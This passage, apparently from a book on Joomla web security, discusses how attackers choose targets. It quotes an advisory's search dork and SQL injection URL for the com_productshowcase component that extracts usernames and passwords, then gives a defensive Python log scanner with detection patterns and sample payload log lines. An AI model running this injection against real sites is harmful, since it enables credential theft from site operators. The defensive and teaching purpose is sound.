Joomla! Web Security

Acquiring Target


In a military sense, when a "weapons platform" is searching for a target, it will be in acquiring target mode. This simply means it is still searching for the target.

The bad guys do the same thing; they "acquire" or choose targets. Once they have chosen a target, the real work begins.

Here I'll make a distinction between the really skilled crackers (the pros, as I call them) and the kids who use their stuff.

Let me give you an example from a recent vulnerability discovered and posted on the site www.milw0rm.com:

##########################################
#
# Joomla Component com_productshowcase SQL Injection
###########################################
##AUTHOR : S@BUN
###########################################
#
# DORKS 1 : allinurl :"com_productshowcase"
#
###########################################
EXPLOIT :
index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id= -99999/**/union/**/select/**/0,concat(username,0x3a,password), concat(username...
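
From the defender's side, requests shaped like the one in this advisory stand out in a web server access log. The following is an added example, not code from the book or from the advisory: it flags requests to com_productshowcase whose id parameter is not a plain integer or carries a comment-separated UNION SELECT. The log lines are constructed, and the rule that a legitimate id is a non-negative integer is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines for illustration (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2008:10:01:02 +0000] "GET /index.php?option=com_productshowcase&Itemid=5&action=details&id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Mar/2008:10:04:40 +0000] "GET /index.php?option=com_productshowcase&Itemid=x&action=details&id=-99999/**/union/**/select/**/0,1 HTTP/1.1" 200 734',
    '203.0.113.9 - - [10/Mar/2008:10:04:45 +0000] "GET /index.php?option=com_productshowcase&action=details&id=-1%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0 HTTP/1.1" 200 734',
    '198.51.100.7 - - [10/Mar/2008:10:05:00 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT_RE = re.compile(r"\bunion\b\s*(?:all\s*)?\bselect\b", re.I)


def normalise(value):
    """Turn inline SQL comments into spaces so /**/-separated keywords line up."""
    return re.sub(r"\s+", " ", SQL_COMMENT_RE.sub(" ", value)).strip()


def classify(line, component="com_productshowcase"):
    """Return (client, findings) for a suspicious request to the component, else None."""
    match = REQUEST_RE.match(line)
    if not match:
        return None
    client, target = match.groups()
    # parse_qs percent-decodes values, so %2F%2A%2A%2F is seen as /**/.
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if query.get("option", [""])[0].lower() != component:
        return None
    findings = []
    for raw in query.get("id", []):
        if not re.fullmatch(r"\d+", raw):  # assumption: a valid id is a plain integer
            findings.append("non-numeric id")
        if UNION_SELECT_RE.search(normalise(raw)):
            findings.append("union select in id")
    return (client, findings) if findings else None


def scan(lines):
    """Return the findings for every suspicious line, in log order."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for client, findings in scan(SAMPLE_LOG):
        print(client, ", ".join(findings))
```

The integer check catches the request even when the keyword pattern is evaded, which is why the same check belongs in the component itself, before the value reaches the query.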